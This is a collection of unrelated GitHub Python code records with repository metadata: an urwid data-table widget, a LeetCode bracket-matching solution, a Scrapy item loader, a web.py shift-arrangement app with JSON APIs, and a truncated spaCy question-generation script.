\"g23\"],#\"g23\"],\n }\n\n entries = dict()\n\n row_attr = \"table_row_body\"\n for suffix in [None, \"focused\",\n \"highlight\", \"highlight focused\"]:\n if suffix:\n attr = ' '.join([row_attr, suffix])\n else:\n attr = row_attr\n entries[attr] = PaletteEntry(\n mono = \"white\",\n foreground = foreground_map[row_attr][0],\n background = background_map[suffix][0],\n foreground_high = foreground_map[row_attr][1],\n background_high = background_map[suffix][1],\n )\n\n header_foreground_map = {\n None: [\"white,bold\", \"white,bold\"],\n \"focused\": [\"dark gray\", \"white,bold\"],\n \"column_focused\": [\"black\", \"black\"],\n \"highlight\": [\"yellow,bold\", \"yellow,bold\"],\n \"highlight focused\": [\"yellow\", \"yellow\"],\n \"highlight column_focused\": [\"yellow\", \"yellow\"],\n }\n\n header_background_map = {\n None: [\"light gray\", \"g23\"],\n \"focused\": [\"light gray\", \"g50\"],\n \"column_focused\": [\"white\", \"g70\"],#\"g23\"],\n \"highlight\": [\"light gray\", \"g38\"],\n \"highlight focused\": [\"light gray\", \"g50\"],\n \"highlight column_focused\": [\"white\", \"g70\"],\n }\n\n for prefix in [\"table_row_header\", \"table_row_footer\"]:\n for suffix in [\n None, \"focused\", \"column_focused\",\n \"highlight\", \"highlight focused\",\n \"highlight column_focused\"\n ]:\n if suffix:\n attr = ' '.join([prefix, suffix])\n else:\n attr = prefix\n entries[attr] = PaletteEntry(\n mono = \"white\",\n foreground = header_foreground_map[suffix][0],\n background = header_background_map[suffix][0],\n foreground_high = header_foreground_map[suffix][1],\n background_high = header_background_map[suffix][1],\n )\n\n\n for name, entry in list(user_entries.items()):\n DataTable.focus_map[name] = \"%s focused\" %(name)\n DataTable.highlight_map[name] = \"%s highlight\" %(name)\n DataTable.highlight_focus_map[\"%s highlight\" %(name)] = \"%s highlight focused\" %(name)\n for suffix in [None, \"focused\",\n \"highlight\", \"highlight focused\"]:\n\n # Check entry backgroun colors against default bg. If they're\n # the same, replace the entry's background color with focus or\n # highglight color. If not, preserve the entry background.\n\n default_bg_rgb = urwid.AttrSpec(default_background, default_background, 16)\n bg_rgb = urwid.AttrSpec(entry.background, entry.background, 16)\n background = background_map[suffix][0]\n if default_bg_rgb.get_rgb_values() != bg_rgb.get_rgb_values():\n background = entry.background\n\n background_high = background_map[suffix][1]\n if entry.background_high:\n bg_high_rgb = urwid.AttrSpec(entry.background_high, entry.background_high, 1<<24)\n if default_bg_rgb.get_rgb_values() != bg_high_rgb.get_rgb_values():\n background_high = entry.background_high\n\n foreground = entry.foreground\n background = background\n foreground_high = entry.foreground_high if entry.foreground_high else entry.foreground\n if min_contrast_entries and name in min_contrast_entries:\n # All of this code is available in the colourettu package\n # (https://github.com/MinchinWeb/colourettu) but newer\n # versions don't run Python 3, and older versions don't work\n # right.\n def normalized_rgb(r, g, b):\n\n r1 = r / 255\n g1 = g / 255\n b1 = b / 255\n\n if r1 <= 0.03928:\n r2 = r1 / 12.92\n else:\n r2 = math.pow(((r1 + 0.055) / 1.055), 2.4)\n if g1 <= 0.03928:\n g2 = g1 / 12.92\n else:\n g2 = math.pow(((g1 + 0.055) / 1.055), 2.4)\n if b1 <= 0.03928:\n b2 = b1 / 12.92\n else:\n b2 = math.pow(((b1 + 0.055) / 1.055), 2.4)\n\n return (r2, g2, b2)\n\n def luminance(r, g, b):\n\n return math.sqrt(\n 0.299*math.pow(r, 2) +\n 0.587*math.pow(g, 2) +\n 0.114*math.pow(b, 2)\n )\n\n def contrast(c1, c2):\n\n n1 = normalized_rgb(*c1)\n n2 = normalized_rgb(*c2)\n lum1 = luminance(*n1)\n lum2 = luminance(*n2)\n minlum = min(lum1, lum2)\n maxlum = max(lum1, lum2)\n return (maxlum + 0.05) / (minlum + 0.05)\n\n table_bg = background_map[suffix][1]\n attrspec_bg = urwid.AttrSpec(table_bg, table_bg, 256)\n color_bg = attrspec_bg.get_rgb_values()[3:6]\n attrspec_fg = urwid.AttrSpec(\n foreground_high,\n foreground_high,\n 256\n )\n color_fg = attrspec_fg.get_rgb_values()[0:3]\n cfg = contrast(color_bg, color_fg)\n cblack = contrast((0,0,0), color_fg)\n # cwhite = contrast((255, 255, 255), color_fg)\n # logger.info(\"%s, %s, %s\" %(cfg, cblack, cwhite))\n # raise Exception(\"%s, %s, %s, %s, %s, %s\" %(table_bg, color_fg, color_bg, cfg, cblack, cwhite))\n if cfg < min_contrast and cfg < cblack:\n # logger.info(\"adjusting contrast of %s\" %(name))\n foreground_high = \"black\"\n # if cblack > cwhite:\n # else:\n # foreground_high = \"white\"\n\n if suffix:\n attr = ' '.join([name, suffix])\n else:\n attr = name\n\n # print foreground, foreground_high, background, background_high\n entries[attr] = PaletteEntry(\n mono = \"white\",\n foreground = foreground,\n background = background,\n foreground_high = foreground_high,\n background_high = background_high,\n )\n\n entries.update({\n\n \"scroll_pos\": PaletteEntry(\n mono = \"white\",\n foreground = \"black\",\n background = \"white\",\n foreground_high = \"black\",\n background_high = \"white\"\n ),\n \"scroll_marker\": PaletteEntry(\n mono = \"white,bold\",\n foreground = \"black,bold\",\n background = \"white\",\n foreground_high = \"black,bold\",\n background_high = \"white\"\n ),\n \"scroll_view\": PaletteEntry(\n mono = \"black\",\n foreground = \"black\",\n background = \"light gray\",\n foreground_high = \"black\",\n background_high = \"g50\"\n ),\n \"scroll_bg\": PaletteEntry(\n mono = \"black\",\n foreground = \"light gray\",\n background = \"dark gray\",\n foreground_high = \"light gray\",\n background_high = \"g23\"\n ),\n\n })\n # raise Exception(entries)\n return entries\n\n\n @property\n def focus(self): return self._focus\n\n def next_position(self, position):\n index = position + 1\n if index > len(self.filtered_rows): raise IndexError\n return index\n\n def prev_position(self, position):\n index = position-1\n if index < 0: raise IndexError\n return index\n\n def set_focus(self, position):\n # logger.debug(\"walker set_focus: %d\" %(position))\n self._focus = position\n self._modified()\n\n def _modified(self):\n # self.focus_position = 0\n urwid.listbox.ListWalker._modified(self)\n\n def __getitem__(self, position):\n # logger.debug(\"walker get: %d\" %(position))\n if position < 0 or position >= len(self.filtered_rows): raise IndexError\n try:\n r = self.get_row_by_position(position)\n return r\n except IndexError:\n logger.error(traceback.format_exc())\n raise\n # logger.debug(\"row: %s, position: %s, len: %d\" %(r, position, len(self)))\n\n def __len__(self):\n return len(self.filtered_rows)\n\n def __getattr__(self, attr):\n if attr in [\n \"head\",\n \"tail\",\n \"index_name\",\n \"log_dump\",\n ]:\n return getattr(self.df, attr)\n elif attr in [\"body\"]:\n return getattr(self.listbox, attr)\n # elif attr == \"body\":\n # return self.walker\n raise AttributeError(attr)\n\n @property\n def column_names(self):\n return [c.name for c in self.columns]\n\n @property\n def focus_position(self):\n return self._focus\n # return self.listbox.focus_position\n\n @focus_position.setter\n def focus_position(self, value):\n self._focus = value\n # self.listbox.focus_position = value\n self.listbox._invalidate()\n\n def position_to_index(self, position):\n # if not self.query_sort and self.sort_by[1]:\n # position = -(position + 1)\n return self.df.index[position]\n\n def index_to_position(self, index):\n # raise Exception(index, self.df.index)\n return self.df.index.index(index)\n\n def get_dataframe_row(self, index):\n logger.debug(\"__getitem__: %s\" %(index))\n try:\n v = self.df[index:index]\n except IndexError:\n logger.debug(traceback.format_exc())\n\n return self.df.get_columns(index, as_dict=True)\n\n def get_row(self, index):\n try:\n row = self.df.get(index, \"_rendered_row\")\n except:\n raise\n\n if self.df.get(index, \"_dirty\") or not row:\n # logger.debug(\"render %d\" %(position))\n self.refresh_calculated_fields([index])\n # vals = self[index]\n vals = self.get_dataframe_row(index)\n row = self.render_item(vals)\n focus = self.df.get(index, \"_focus_position\")\n if focus is not None:\n row.set_focus_column(focus)\n # logger.debug(\"render: %d, %d, %s\" %(position, index, row))\n self.df.set(index, \"_rendered_row\", row)\n self.df.set(index, \"_dirty\", False)\n return row\n\n def get_row_by_position(self, position):\n index = self.position_to_index(self.filtered_rows[position])\n return self.get_row(index)\n\n @property\n def selection(self):\n if len(self.body) and self.focus_position is not None:\n # FIXME: make helpers to map positions to indexes\n return self[self.focus_position]\n\n\n def render_item(self, item):\n # raise Exception(item)\n row = DataTableBodyRow(self, item,\n border = self.border,\n padding = self.padding,\n index=item[self.index])\n return row\n\n def refresh_calculated_fields(self, indexes=None):\n if not indexes:\n indexes = self.df.index[:]\n if not hasattr(indexes, \"__len__\"):\n indexes = [indexes]\n for col in self.columns:\n if not col.value_fn: continue\n for index in indexes:\n if self.df[index, \"_dirty\"]:\n self.df.set(index, col.name, col.value_fn(self, self.get_dataframe_row(index)))\n\n def visible_column_index(self, column_name):\n try:\n return next(i for i, c in enumerate(self.visible_columns)\n if c.name == column_name)\n\n except StopIteration:\n raise IndexError\n\n def sort_by_column(self, col=None, reverse=None, toggle=False):\n\n column_name = None\n column_number = None\n\n if isinstance(col, tuple):\n col, reverse = col\n\n elif col is None:\n col = self.sort_column\n\n if isinstance(col, int):\n try:\n column_name = self.visible_columns[col].name\n except IndexError:\n raise Exception(\"bad column number: %d\" %(col))\n column_number = col\n elif isinstance(col, str):\n column_name = col\n try:\n column_number = self.visible_column_index(column_name)\n except:\n column_number = None\n\n self.sort_column = column_number\n\n if not column_name:\n return\n try:\n column = next((c for c in self.columns if c.name == column_name))\n except:\n return # FIXME\n # raise NoSuchColumnException(\"column %s not found (%s)\" %(column_name, [c.name for c in self.columns]))\n # reverse = column.sort_reverse\n\n if reverse is None and column.sort_reverse is not None:\n reverse = column.sort_reverse\n\n if toggle and column_name == self.sort_by[0]:\n reverse = not self.sort_by[1]\n sort_by = (column_name, reverse)\n # sort_by = (column_name, reverse)\n # self.log_dump()\n\n # if not self.query_sort:\n\n self.sort_by = sort_by\n logger.info(\"sort_by: %s (%s), %s\" %(column_name, self.sort_column, reverse))\n if self.query_sort:\n self.reset()\n # else:\n\n row_index = None\n if self.sort_refocus:\n row_index = self[self._focus].data.get(self.index, None)\n logger.info(\"row_index: %s\" %(row_index))\n self.sort(column_name, key=column.sort_key)\n\n if self.with_header:\n self.header.update_sort(self.sort_by)\n\n self.set_focus_column(self.sort_column)\n if row_index:\n self.focus_position = self.index_to_position(row_index)\n\n def sort(self, column, key=None):\n import functools\n logger.debug(column)\n if not key:\n key = lambda x: (x is None, x)\n self.df.sort_columns(\n column,\n key = key,\n reverse = self.sort_by[1])\n self._modified()\n\n\n def set_focus_column(self, index):\n if self.with_header:\n self.header.set_focus_column(self.sort_column)\n\n if self.with_footer:\n self.footer.set_focus_column(self.sort_column)\n\n # logger.debug(\"set_focus_column: %d\" %(index))\n self.df[\"_focus_position\"] = index\n self.df[\"_dirty\"] = True\n\n def cycle_sort_column(self, step):\n\n if not self.ui_sort:\n return\n if self.sort_column is None:\n index = 0\n else:\n index = (self.sort_column + step)\n if index < 0: index = len(self.visible_columns)-1\n if index > len(self.visible_columns)-1: index = 0\n logger.debug(\"index: %d\" %(index))\n self.sort_by_column(index)\n\n def sort_index(self):\n self.df.sort_index()\n self._modified()\n\n def requery(self, offset=0, load_all=False, **kwargs):\n\n # logger.info(\"requery\")\n kwargs = {\"load_all\": load_all}\n if self.query_sort:\n kwargs[\"sort\"] = self.sort_by\n else:\n kwargs[\"sort\"] = (None, False)\n if self.limit:\n kwargs[\"offset\"] = offset\n kwargs[\"limit\"] = self.limit\n\n rows = list(self.query(**kwargs))\n # self.offset += self.limit\n # logger.info(\"offset: %s\" %(self.offset))\n self.append_rows(rows)\n self.refresh_calculated_fields()\n self.apply_filters()\n # for r in rows:\n # self.refresh_calculated_fields(r[self.index])\n\n\n\n def append_rows(self, rows):\n # logger.info(\"append_rows: %s\" %([row[self.index] for row in rows]))\n self.df.append_rows(rows)\n self.df[\"_focus_position\"] = self.sort_column\n self.invalidate()\n self._modified()\n\n def add_columns(self, columns, data=None):\n\n if not isinstance(columns, list):\n columns = [columns]\n if data:\n data = [data]\n\n self.columns += columns\n for i, column in enumerate(columns):\n self.df[column.name] = data=data[i] if data else None\n\n self.invalidate()\n\n def remove_columns(self, columns):\n\n if not isinstance(columns, list):\n columns = [columns]\n\n columns = [ self.columns[column].name\n if isinstance(column, int)\n else column for column in columns ]\n\n self.columns = [ c for c in self.columns if c.name not in columns ]\n self.df.delete_columns(columns)\n self.invalidate()\n\n def set_columns(self, columns):\n self.remove_columns([c.name for c in self.columns])\n self.add_columns(columns)\n self.reset()\n\n def toggle_columns(self, columns, show=None):\n\n if not isinstance(columns, list):\n columns = [columns]\n\n for column in columns:\n if isinstance(column, int):\n try:\n column = self.columns[column]\n except IndexError:\n raise Exception(\"bad column number: %d\" %(column))\n else:\n try:\n column = next(( c for c in self.columns if c.name == column))\n except IndexError:\n raise Exception(\"column %s not found\" %(column))\n\n if show is None:\n column.hide = not column.hide\n else:\n column.hide = show\n self.invalidate()\n\n def show_columns(self, columns):\n self.toggle_columns(columns, True)\n\n def hide_columns(self, columns):\n self.show_column(columns, False)\n\n def toggle_details(self):\n self.selection.toggle_details()\n\n @property\n def visible_columns(self):\n return [ c for c in self.columns if not c.hide ]\n\n def add_row(self, data, sort=True):\n # raise Exception(data)\n self.append_rows([data])\n if sort:\n self.sort_by_column()\n self.apply_filters()\n # else:\n # self.invalidate()\n\n def delete_rows(self, indexes):\n self.df.delete_rows(indexes)\n self.apply_filters()\n if self.focus_position >= len(self)-1:\n self.focus_position = len(self)-1\n # if self.focus > len(self)-1:\n # self.focus = len(self)-1\n # self._modified()\n # self.invalidate()\n\n\n def invalidate(self):\n self.df[\"_dirty\"] = True\n if self.with_header:\n self.header.update()\n if self.with_footer:\n self.footer.update()\n self._modified()\n\n def invalidate_rows(self, indexes):\n if not isinstance(indexes, list):\n indexes = [indexes]\n for index in indexes:\n self.refresh_calculated_fields(index)\n\n self.df[indexes, \"_dirty\"] = True\n self._modified()\n # FIXME: update header / footer if dynamic\n\n def swap_rows_by_field(self, p0, p1, field=None):\n\n if not field:\n field=self.index\n\n i0 = self.position_to_index(p0)\n i1 = self.position_to_index(p1)\n\n r0 = { k: v[0] for k, v in list(self.df[i0, None].to_dict().items()) }\n r1 = { k: v[0] for k, v in list(self.df[i1, None].to_dict().items()) }\n\n for k, v in list(r0.items()):\n if k != field:\n self.df.set(i1, k, v)\n\n for k, v in list(r1.items()):\n if k != field:\n self.df.set(i0, k, v)\n self.df.set(i0, \"_dirty\", True)\n\n self.invalidate_rows([i0, i1])\n\n def swap_rows(self, p0, p1, field=None):\n # r0 = self[self.position_to_index(p0)]\n # r1 = self[self.position_to_index(p1)]\n self.swap_rows_by_field(p0, p1, field=field)\n\n def row_count(self):\n\n if not self.with_scrollbar:\n return None\n\n if self.limit:\n if self.page*self.limit >= self.query_result_count():\n return len(self.filtered_rows)\n else:\n return self.query_result_count()\n else:\n return len(self)\n\n def load_more(self):\n offset = self.page*self.limit\n if offset >= self.row_count():# or offset >= len(self):\n return\n logger.info(\"load_more: page: %s, offset: %s, len: %s\" %(self.page, offset, self.row_count()))\n self.requery(offset)\n self.page += 1\n\n def load_all(self):\n if len(self) >= self.query_result_count():\n return\n logger.info(\"load_all: %s\" %(self.page))\n self.requery(self.page*self.limit, load_all=True)\n self.page = (self.query_result_count() // self.limit)\n self.listbox._invalidate()\n\n def apply_filters(self, filters=None):\n\n if not filters:\n filters = self.filters\n elif not isinstance(filters, list):\n filters = [filters]\n\n self.filtered_rows = blist(\n i\n for i, row in enumerate(self.df.iterrows())\n if not filters or all(\n f(row)\n for f in filters\n )\n )\n if self.focus_position > len(self):\n self.focus_position = len(self)-1\n\n # logger.info(\"filtered: %s\" %(self.filtered_rows))\n\n\n self.filters = filters\n self.invalidate()\n\n def clear_filters(self):\n self.filtered_rows = blist(range(len(self.df)))\n self.filters = None\n self.invalidate()\n\n def reset(self, reset_sort=False):\n logger.debug(\"reset\")\n # self.offset = 0\n # if self.query_sort:\n # self.df.clear()\n # if requery or self.query_sort:\n self.df.clear()\n self.requery()\n self.page = 1\n self.clear_filters()\n self.apply_filters()\n if reset_sort:\n self.sort_by_column(self.initial_sort)\n self.focus_position = 0\n # self.invalidate()\n\n def load(self, path):\n\n with open(path, \"r\") as f:\n json = \"\\n\".join(f.readlines())\n self.df = DataTableDataFrame.from_json(json)\n self.reset()\n\n def save(self, path):\n # print(path)\n with open(path, \"w\") as f:\n f.write(self.df.to_json())\n\n # def keypress(self, size, key):\n # if key != \"enter\":\n # return key\n # urwid.emit_signal(self, \"select\")\n\n # def mouse_event(self, size, event, button, col, row, focus):\n # if event == 'mouse press':\n # urwid.emit_signal(self, \"click\")\n","repo_name":"tonycpsu/urwid-datatable","sub_path":"urwid_datatable/datatable.py","file_name":"datatable.py","file_ext":"py","file_size_in_byte":33518,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"73392196879","text":"# -*- coding: utf-8 -*-\n\n# __author__ = xiaobao\n# __date__ = 2019/09/27 22:19:09\n\n# desc: \n# 给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效。\n\n# 有效字符串需满足:\n\n# 左括号必须用相同类型的右括号闭合。\n# 左括号必须以正确的顺序闭合。\n# 注意空字符串可被认为是有效字符串。\n\n# 示例 1:\n\n# 输入: \"()\"\n# 输出: true\n# 示例 2:\n\n# 输入: \"()[]{}\"\n# 输出: true\n# 示例 3:\n\n# 输入: \"(]\"\n# 输出: false\n# 示例 4:\n\n# 输入: \"([)]\"\n# 输出: false\n# 示例 5:\n\n# 输入: \"{[]}\"\n# 输出: true\n\n\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/valid-parentheses\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\nclass StackCls(object):\n def __init__(self):\n self.m_listObj = []\n self.m_nCount = 0\n \n def Push(self, obj):\n self.m_nCount += 1\n self.m_listObj.append(obj)\n\n def Pop(self):\n if self.m_nCount <= 0:\n return None\n self.m_nCount -= 1\n return self.m_listObj.pop()\n\n\nclass Solution:\n def isValid(self, s):\n stackObj = StackCls()\n dictLeft = {\"(\":\")\", \"[\":\"]\", \"{\":\"}\"}\n dictRight = {\")\":\"(\", \"]\":\"[\", \"}\":\"{\"}\n for char in s:\n if char in dictLeft:\n stackObj.Push(char)\n elif char in dictRight:\n charPop = stackObj.Pop()\n if dictRight[char] != charPop:\n return False\n else:\n return False\n \n return stackObj.Pop() is None\n\nsolutionObj = Solution()\n# 空串\nassert(solutionObj.isValid(\"\"))# 0\n# 成对,嵌套\nassert(solutionObj.isValid(\"{[()()][]}\"))# 0\n# 不成对\nassert(solutionObj.isValid(\"{\") == False)# 0\nassert(solutionObj.isValid(\"}\") == False)# 0","repo_name":"xiewendan/algorithm","sub_path":"leetcode/20 valid-parentheses.py","file_name":"20 valid-parentheses.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72441995918","text":"from collections import namedtuple\n\n\nclass RoomConstants:\n class RoomType:\n SINGLE = 1\n GROUP = 2\n\n class Status:\n NORMAL = 1\n\n\nclass RoomMessageConstants:\n class IsRead:\n YES = 1\n NO = 0\n\n\nPF_DB_NAME = \"senguopf\"\n\n\nclass DefaultObject:\n ACCOUNT_INFO = namedtuple(\n \"account_info\",\n [\n \"id\",\n \"name\",\n \"headimgurl\",\n \"sex\",\n \"debt_rest\",\n \"remark\",\n \"nickname\",\n \"realname\",\n \"passport_id\",\n ],\n )(0, \"\", \"\", 0, 0, \"\", \"\", \"\", 0)\n\n SHOP_INFO = namedtuple(\n \"account_info\",\n [\n \"id\",\n \"boss_id\",\n \"shop_name\",\n \"shop_img\",\n \"shop_phone\",\n \"shop_address\",\n \"shop_province\",\n \"shop_city\",\n \"shop_county\",\n \"has_done\",\n \"merchant_name\",\n \"industry_type\",\n \"business_license\",\n \"realname\",\n \"nickname\",\n \"market_id\",\n ],\n )(0, 0, \"\", \"\", \"\", \"\", \"\", \"\", \"\", -1, \"\", 0, \"\", \"\", \"\", 0)\n","repo_name":"georgeye323/george_im","sub_path":"senguo_im/chat/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23371527639","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import TakeFirst, MapCompose\n\n\ndef add_schema(url, loader_context):\n response = loader_context['response']\n if response:\n return response.urljoin(url)\n else:\n return 'http:' + url\n\n\nclass OoxxItem(scrapy.Item):\n author_name = scrapy.Field()\n pic_url = scrapy.Field()\n pub_date = scrapy.Field()\n result = scrapy.Field()\n\n\nclass OoxxItemLoader(ItemLoader):\n author_name_in = MapCompose(str.strip)\n author_name_out = TakeFirst()\n\n pic_url_in = MapCompose(add_schema)\n # pic_url_out = TakeFirst()\n\n pub_date_in = MapCompose(str.strip)\n pub_date_out = TakeFirst()\n","repo_name":"ygsun/misc","sub_path":"jandan/jandan/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21383028618","text":"# -*- coding: utf-8 -*-\n# @Author: SHLLL\n# @email: shlll7347@gmail.com\n# @Date: 2018-09-23 17:24:50\n# @License: MIT LICENSE\n# @Last Modified by: SHLLL\n# @Last Modified time: 2018-10-14 17:26:12\n\nimport web\nimport json\nfrom hosarg.utils import DataPerpare\nfrom hosarg.utils import dataprepare\nfrom hosarg.utils.datapreprocess import PersonData\nfrom hosarg.arrange.wardarrangeAPI import WardArrangeAPI\nfrom hosarg.utils.datapreprocess.personDataApi import PersonDataApi\n\nurls = (\n '/', 'Index',\n '/login', 'Login',\n '/logout', 'Logout',\n '/index.html', 'Index',\n '/user.html', 'User',\n '/depart.html', 'Depart',\n '/ward.html', 'Ward',\n '/api/peopledata', 'APIPeopledata',\n '/api/departdata', \"APIDepartdata\",\n '/api/warddata', 'APIWard',\n '/api/uploadData', 'APIUpload',\n '/api/clearData', 'APIClear',\n '/api/backupData', 'APIBackup'\n)\n\napp = web.application(urls, globals())\nrender = web.template.render(\"templete/\")\n# 直接从Json数据库中读取数据\ndata_struct = {'data': DataPerpare(2).data}\n\n\n# Store the session someplace we can access from anywhere\n# This fixes the problem caused by the server refreshing,\n# which arose due to webpy default debug mode.\nweb.config.session_parameters['timeout'] = 3600 # cookie timeout for 3600s\nif not web.config.get('session'):\n # Define the initial session\n # Store the data in the directory './sessions'\n store = web.session.DiskStore('hosarg/data/sessions')\n session = web.session.Session(app, store, initializer={'login': 0})\n\n # Store it somewhere we can access\n web.config.session = session\nelse:\n # If it is already created, just use the old one\n session = web.config.session\n\n\ndef logged():\n '''判断是否已经登录'''\n if session.login == 1:\n return True\n else:\n return False\n\n\nclass Login(object):\n def GET(self):\n if logged():\n raise web.seeother('/index.html')\n else:\n return render.login('')\n\n def POST(self):\n name, passwd = web.input().name, web.input().passwd\n\n if name == 'arrange' and passwd == 'zxcdsaqwe321':\n session.login = 1\n return web.seeother('/index.html')\n else:\n session.login = 0\n return render.login('账号密码错误,请重试')\n\n\nclass Logout(object):\n def GET(self):\n session.kill() # 清除session\n raise web.seeother('/login')\n\n\nclass Index(object):\n def GET(self):\n if logged():\n return render.index()\n else:\n raise web.seeother('/login')\n\n\nclass User(object):\n def GET(self):\n if logged():\n return render.user()\n else:\n raise web.seeother('/login')\n\n\nclass Depart(object):\n def GET(self):\n if logged():\n return render.depart()\n else:\n raise web.seeother('/login')\n\n\nclass Ward(object):\n def GET(self):\n if logged():\n return render.ward()\n else:\n raise web.seeother('/login')\n\n\nclass APIPeopledata(object):\n def GET(self):\n data_struct['data'] = DataPerpare(2).data\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps(data_struct['data'])\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n data_struct['data'] = data\n PersonData(data).working(3)\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'ok'})\n\n\nclass APIDepartdata(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n data_struct['depart'] = data\n WardArrangeAPI(data_struct['data']).update_person_data(data)\n data_struct['slice'] = WardArrangeAPI(\n data_struct['data']).slice_people(data['data'])\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps(data_struct['slice'])\n\n\nclass APIWard(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n depart_data = data['people']\n date_data = data['range']\n data_struct['depart'] = depart_data\n data_struct['ward'] = WardArrangeAPI(data_struct['data'])\\\n .arrange_ward(\n depart_data,\n date_data['month'],\n date_data['startday'],\n date_data['endday'],\n date_data['data']\n )\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps(data_struct['ward'])\n\n\nclass APIUpload(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n PersonDataApi(data_struct['data']).write_2_json(data)\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'ok'})\n\n\nclass APIClear(object):\n def GET(self):\n PersonDataApi(data_struct['data']).clear_2_json()\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'ok'})\n\n def POST(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n\nclass APIBackup(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n data = dataprepare.backup_get_data(data_struct['data'])\n return json.dumps(data)\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n dataprepare.backup_set_data(data_struct['data'], data)\n return json.dumps({'status': 'ok'})\n\n\napplication = app.wsgifunc()\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"shlllshlll/Arrangement","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"28534030302","text":"# uncomment to suppress warnings about version\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport nltk\nimport spacy\nimport benepar\nfrom benepar.spacy_plugin import BeneparComponent\nfrom nltk.corpus import wordnet as wn\nimport simpleBinary\n\n#python -m pip install tensorflow==1.14 will help.\ndef preprocess(sentence):\n clauses = [] \n nlp = spacy.load(\"en_core_web_sm\")\n nlp.add_pipe(BeneparComponent('benepar_en2'))\n doc = nlp(sentence)\n if len(list(doc.sents)) == 0:\n return clauses\n sent = list(doc.sents)[0]\n children = list(sent._.children)\n puncts = '?!.,;:-'\n for clause in children: \n if clause.text not in puncts:\n if 'S' in clause._.labels:\n clauses.append((clause.text + '.'))\n \n if not clauses:\n return [sentence]\n else:\n return clauses\n\n# should only enter this function if the root of the syntax\n# tree is a VP (verb phrase)\ndef ask_compound_bin_question(sentence):\n nlp = spacy.load(\"en_core_web_sm\")\n doc = nlp(sentence)\n lemmas = []\n correct_do = ''\n subject_explained = ''\n subjects = [] \n subj = None\n # lemmatize verb\n for token in doc:\n if 'subj' in token.dep_:\n subj = token.text\n subject_explained = spacy.explain(token.tag_)\n subjects.append(token)\n elif 'conj' in token.dep_ and token.head.text == 'subj': \n subjects.append(token.head.text) \n if token.pos_ == \"VERB\":\n verb_explained = spacy.explain(token.tag_)\n\n if 'present' in verb_explained:\n if len(subjects)>1: \n correct_do = 'Do'\n elif 'plural' in subject_explained:\n correct_do = 'Do'\n elif 'personal' in subject_explained:\n correct_do = 'Do'\n elif 'singular' in verb_explained: \n correct_do = 'Does'\n # use past tense inflection\n else:\n correct_do = 'Did'\n lemmas.append(token.lemma_)\n\n # construct question\n question = correct_do\n after_subj = False\n # add in subject\n i = 0\n while i < len(doc): \n token = doc[i]\n\n if 'subj' in token.dep_:\n if token.pos_ == 'PRON' and token.text != 'I':\n question += ' ' + token.text.lower()\n else:\n question += ' ' + token.text\n after_subj = True\n # account for case of gerund/present participle\n # go + verb-ing\n elif token.pos_ == 'VERB' and 'gerund' not in spacy.explain(token.tag_):\n question += ' ' + lemmas.pop(0) \n elif token.pos_ == 'DET': \n question += ' ' + token.text.lower() \n elif token.pos_ == 'INTJ' and not after_subj: \n i += 1\n # end question at punctuation\n elif 'sentence closer' in spacy.explain(token.tag_):\n question += '?'\n return question \n else:\n question += ' ' + token.text\n\n i += 1\n\n return question\n\ndef postprocess (sentences):\n questions = []\n for sentence in sentences:\n qn = ask_compound_bin_question(sentence)\n questions.append((qn, sentence))\n '''\n wordNetQns = simpleBinary.useWordNet(qn)\n for qn in wordNetQns:\n questions.append((qn, sentence))\n '''\n return questions\n\ndef ask_q (sentence):\n sentences = preprocess(sentence)\n questions = postprocess(sentences)\n return questions\n\n'''\n\ns4 = 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'\n# print(ask_q(s4))\n\n[('Does Unfortunately for their mother , Alice and Bob really hate brussel sprouts?', 